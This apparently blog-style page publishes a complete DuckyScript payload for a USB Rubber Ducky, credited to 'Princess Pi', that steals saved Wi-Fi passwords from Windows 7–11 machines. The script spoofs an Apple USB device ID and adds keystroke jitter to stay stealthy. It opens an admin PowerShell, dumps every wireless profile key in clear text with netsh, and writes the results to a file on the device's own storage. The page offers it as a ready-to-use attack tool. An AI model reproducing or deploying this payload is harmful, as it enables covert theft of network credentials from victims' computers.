Wifi Password Stealing Rubber Ducky Payload

Wifi Password Stealing Rubber Ducky Payload

DuckyScript 3.0. made to be as stealthy as possible. Rename your Rubber Ducky in mass storage mode to be named “PL”

REM Admin PowerShell and Exfil wifi passwords via mass storage

REM Windows 7-11

REM Author: Princess Pi

REM ATTACKMODE HID STORAGE

ATTACKMODE HID STORAGE VID_05AC PID_021E MAN_USB PROD_pl SERIAL_D441

$_JITTER_ENABLED = TRUE

$_JITTER_MAX = 5

LED_R

DELAY 800

GUI x

DELAY 550

a

DELAY 550

ALT y

DELAY 750

STRINGLN $wifis = (netsh wlan show profiles) | Select-String “\:(.+)$” | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=”$name” key=clear)} | Select-String “Key Content\W+\:(.+)$” | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }}

DELAY 1000

STRINGLN $m=(Get-Volume -FileSystemLabel ‘PL’).DriveLetter

DELAY 400

STRINGLN echo $wifis >> $m’:\wifi_passwords.txt’

DELAY 550

STRINGLN exit

DELAY 300

LED_G

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.